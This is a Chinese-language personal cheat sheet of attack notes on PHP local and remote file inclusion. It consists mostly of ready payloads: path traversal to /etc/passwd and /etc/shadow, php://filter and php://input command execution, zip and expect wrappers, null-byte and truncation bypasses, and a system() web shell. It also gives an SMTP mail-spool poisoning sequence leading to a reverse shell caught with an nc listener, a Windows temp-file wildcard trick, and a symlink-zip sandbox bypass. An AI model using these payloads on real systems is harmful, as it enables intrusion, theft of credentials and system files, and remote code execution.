LFI/RFI漏洞相關

說明

平常作的一些摘抄及本身測試過程當中的一些筆記，若有版權或錯誤歡迎留言指正。

常見敏感漏洞字段

&RealPath=
&FilePath=
&filepath=
&Path=
&path=
&inputFile=
&url=
&urls=
&Lang=
&dis=
&data=
&readfile=
&filep=
&src=
&menu=

一些敏感的本地可讀取路徑

# 有不少，詳見fuzzdb，下面僅舉例部分
/etc/shadow
/etc/passwd
/etc/hosts
/root/.bash_history      # 找user add，cd，MySQL，ssh，nohop看敏感目錄和文件等
/etc/syscomfig/network-scripts/ifcfg-eth1
/etc/syscomfig/network-scripts/ifcfg-eth0
/proc/self/environ

經常使用的Payload

# 有一個paper整理很不錯，大體翻一下。
# 地址： https://www.exploit-db.com/docs/40992.pdf

# 常規規則
/script.php?page=../../../../../../../../etc/passwd
/script.php?page=file://etc/passwd

# PHP Expect Wrapper 默認此php拓展並未開啓
php?page=expect://ls

# PHP file://Wrapper post方式常常出現
/fi/?page=php://input&cmd=ls

# PHP php://filter
vuln.php?page=php://filter/convert.base64-encode/resource=/etc/passwd  
vuln.php?page=php://filter/resource=/etc/passwd

# 上傳包含php反彈shell的壓縮文件
vuln.php?page=zip://path/to/file.zip%23shell

# LFI via /proc/self/environ
# 若是可能包含/proc/self/environ的話，嘗試在UA中寫入shell代碼，而後包含/proc/self/environ執行

# Useful Shells
<? system('uname -a');?>

# Null Byte Technique
vuln.php?page=/etc/passwd%00
vuln.php?page=/etc/passwd%2500

# Truncation LFI Bypass
vuln.php?page=/etc/passwd........................................................................................
vuln.php?page=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
vuln.php?page=/etc/passwd/../../../../../../../../../../../../../../../../../..

# 日誌文件包含，好比系統日誌，404日誌，web日誌等

# Email a Reverse Shell
# 若是一個網站沒有MX記錄指定，使用www-data或者apache user調用系統smtp存儲發送郵件的話，那麼能夠嘗試在郵件內容中寫入payload，會被存儲在/var/spool/mail/www-data，訪問vuln.php?page=/var/spool/mail/www-data觸發反彈shell

# 具體利用
# 爆破查看是否有web容器用戶
smtp-user-enum -M VRFY -U username.txt -t 10.0.0.0
# 使用web容器用戶(如www-data) telnet發送郵件
telnet 10.0.0.1 25
HELO localhost
MAIL FROM:<root>
RCPT TO:<www-data>
DATA
反彈php shell代碼

# 反彈後，本機鏈接payload中的端口
nc -lvv 8000

# 建議對照英文版閱讀，可能部分詞語翻譯不清楚

利用php在windows下的bug

# 向任意php頁面發包上傳文件都會在tmp目錄生成臨時文件(php特性)，文件名前綴爲php加3個或3個以上的隨機大小寫字母加數字。(如: php47B6) 而且存在時間只有一瞬間。
# 而php在windows下有個bug，就是能使用<<當通配符用。使用<<符號至關於使用*號通配符。
# 依據上面特性包含文件，常見文件操做函數都受此影響。
http://localhost/file.php?b4dboy=../../../../../../../windows/tmp/php<<

# 詳見做者博客：http://secoff.net/archives/223.html

一些雲服務的文件讀取繞過

# 建立軟鏈接繞過沙盒限制讀取文件

# 1.建立一個連接文件到/etc/passwd
ln -s /etc/passwd link

# 2. 壓縮文件，同時保留連接
zip --symlinks test.zip link

# 3.上傳test.zip文件，系統會自動解壓縮

# 4. 代碼文件當中會返回/etc/passwd的內容。

Dockerfile可控任意文件讀取

# Docker的一些好玩的利用下次再說
WORKDIR /
COPY etc/passwd /tmp
VOLUME ["/etc"， '/mnt']

其餘

其餘一些特殊CMS形成的暫且不提，如jsp WEB-INF/web.xml泄漏等

另份總結

# 感謝各位做者的付出分享。
http://blog.csdn.net/cic10235/article/details/52103984